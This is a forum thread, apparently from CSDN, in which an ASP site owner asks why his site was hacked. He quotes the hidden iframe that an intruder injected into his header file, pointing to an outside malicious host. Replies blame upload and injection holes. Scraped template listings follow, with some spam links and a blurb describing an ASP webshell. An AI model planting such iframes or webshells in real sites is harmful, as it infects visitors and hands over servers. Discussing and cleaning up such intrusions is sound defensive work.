2.8w+
社区成员
我网站的asp程序被黑了!
我用网上的asp产品管理程序,在这几天被人给黑了。
好像他能进入我的后台,我访问网站的时候就是一个空白页面,里面什么都没有了。
在index.asp中我有如下代码:
<!-- #include file="top.asp" -->
这个top.asp中是我这个产品发布系统中的每个页面表头,即公司的logo等,这个top.asp在每个asp文件都出现。
当我用ftp把损坏的页面下载后分析时,发现在top.asp中<html>...</html>后,有一段:
<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0></iframe>
是不是他看到了每个页面都有这个top.asp,然后就在里面加了这个东西,大家帮我看看这是个什么东西,其什么作用。那我应该怎样解决这个困难啊,他怎么会看到我的这个top.asp并加了代码呢,我怎样做才能防止类似问题的出现啊,高手帮帮我啊!
好像他能进入我的后台,我访问网站的时候就是一个空白页面,里面什么都没有了。
在index.asp中我有如下代码:
<!-- #include file="top.asp" -->
这个top.asp中是我这个产品发布系统中的每个页面表头,即公司的logo等,这个top.asp在每个asp文件都出现。
当我用ftp把损坏的页面下载后分析时,发现在top.asp中<html>...</html>后,有一段:
<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0></iframe>
是不是他看到了每个页面都有这个top.asp,然后就在里面加了这个东西,大家帮我看看这是个什么东西,其什么作用。那我应该怎样解决这个困难啊,他怎么会看到我的这个top.asp并加了代码呢,我怎样做才能防止类似问题的出现啊,高手帮帮我啊!
...全文
当前发帖距今超过3年,不再开放新的回复
发表回复
gmlwl 2008-11-24
你的程序最大的可能就是有上传漏洞
次之,就是有注入漏洞
把这些堵上就可以了.
如果不是很麻烦的话,我帮你看看
QQ:27699111
如果程序很大,你还是另请高明呵.我时间不是很多.
次之,就是有注入漏洞
把这些堵上就可以了.
如果不是很麻烦的话,我帮你看看
QQ:27699111
如果程序很大,你还是另请高明呵.我时间不是很多.
virgo2008 2008-11-23
就是增加权限,对上传的东西要严格的控制,还有一种就是注入,你没有过滤掉关键字
xiaodu 2008-11-23
说具体点啊,我用的是时代互联的空间,用ftp工具上传,网站有管理后台,你说的后门是指什么啊,怎么避免啊
virgo2008 2008-11-23
被黑了,被人加了<iframe src=http://www.hryspan.cn/one/a26.htm width=50 height=0 border=0> </iframe>
主要看你的程序是不是有后门,一般是上传的漏洞
主要看你的程序是不是有后门,一般是上传的漏洞
公司网站源码 ASP企业网站源码程序(蓝色风格) 源码介绍:蓝色风格公司网站源码,金华地方某代理公司网站源码,企业网站程序配置要求:asp+access其他说明:一款蓝色风格的公司企业网站源码程序,是金华地方某建站公司独立开发。源码基于asp+access制作。模板的...
ASP+access公司企业网站模板源代码【完整功能黑红色】 说明: 这个是基于asp+access的企业网站源码,数据库已设...我还会为大家搜罗更多更好的网站! 地址:http://www.juntais.com/wb008.htm?from=131921&gid=1 或者 http://www.ooxxnow.com/88xx.htm?from=131921&gid=1
追梦flash企业网站黑色高雅版 v10.0.zip 提醒:迷你asp程序无法进入后台,请使用IIS环境。 追梦9X黑色高雅版更新说明: 对页面整体进行颜色调整,通过调整配比度后的模板效果更加大气。 9X系列网站功能介绍: 1.支持网站深度链接功能。 2.seo优化功能...
ASP大马网站渗透测试 四、 右上角的ZONE-H图标为一键提交被黑网页到被黑站点统计www.zone-h.com.cn,个人信息请编辑程序修改,或用生成器生成。 五、 WEB根目录和本程序目录都可以转入文件操作页。 文件操作一:左侧为磁盘和快捷不安全...
黑色风格HTML5企业网站 v2.3 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.4 build20161223 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.4 build20161021 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.4 build20161028 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.4 build20161104 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.4 build20161111 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.4 build20161202 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.4 build20161209 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
黑色风格HTML5企业网站 v2.5 build20170303 黑色风格HTML5企业网站以asp... 程序特色: 一:使搜索引擎更加容易抓取和索引 二:提供更多的功能,提高用户的友好体验 三:可用性的提高,提高用户的友好体验 html5响应式摄影网站系统使用方法: 将文件上传只ASP空间
ASP.NET Web应用程序发布到IIS ASP.NET Web应用程序发布到IIS 一、发布前的准备工作 1.检查数据库连接字符串 2.检查数据库登录名 二、发布(以MVC程序为例) 1.找到 `BundleConfig` 2.发布(VS2019) 3.IIS接入网站文件 4.程序池的调整
网址铺吧网址导航源码程序-Asp源码 网址铺吧网址导航源码程序最大特点本系统改变了以往网址站一成不变的模式,采用谁对我站贡献大,我站也给予他最大的宣传和展示的机会;只要您在本系统注册登记您的网址,然后在你网站做好我站连接,只要平常连接即可...
